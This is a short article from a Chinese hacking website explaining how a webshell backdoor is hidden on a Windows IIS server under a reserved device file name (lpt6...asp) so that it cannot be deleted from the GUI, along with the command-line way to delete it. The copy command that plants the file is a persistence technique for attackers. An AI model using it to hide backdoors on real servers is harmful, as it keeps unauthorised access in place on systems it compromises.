当前位置:免费黑客网-黑客技术,黑客工具,黑客联盟,黑客基地,黑客网站,黑客论坛DDOS黑客技术黑客入侵
日期:2016-04-26 10:58:39  来源:网络

webshell中的不死僵尸和隐藏后门的原理以及删除

主要是利用系统保留文件名创建无法删除的webshell来隐藏后门。Windows 下不能够以下面这些字样来命名文件或文件夹:aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9 www.2cto.com但是通过cmd的copy命令即可实现:D:\wwwroot>copy rootkit. \\.\D:\wwwroot\lpt6.chouwazi.com.asp 前面必须有\\.\已复制1 个文件。D:\wwwroot>dir2011-04-25 14:41 <DIR> .2011-04-25 14:41 <DIR> ..2011-03-08 22:50 42,756 aux.asp2009-05-02 03:02 9,083 index.asp2012-03-08 22:50 42,756 rootkit.asp这类文件无法在图形界面删除,只能在命令行下删除:del D:\wwwroot>del \\.\D:\wwwroot\lpt6.chouwazi.com.asp然而在IIS中,这种文件又是可以解析成功的。Webshell中的"不死僵尸隐藏"的 原理就是这样。作者 臭袜子 blog 本文章原创来源:http://www.hackwd.com/

Tags:[db:关键词]

作者:Hacker

文章评论评论内容只代表网友观点,与本站立场无关!

   评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接- 网站地图
Copyright © 2015-2016 Hackwd.Com. All Rights Reserved .
本站内容来源网络收集,仅供用于黑客技术安全学习参考,请遵守相关法律法规
打造国内最大的黑客技术资源免费发布站
提供最权威的黑客攻防教程,黑客安全工具
免费黑客网-黑客技术,黑客工具,黑客联盟,黑客基地,黑客网站,黑客论坛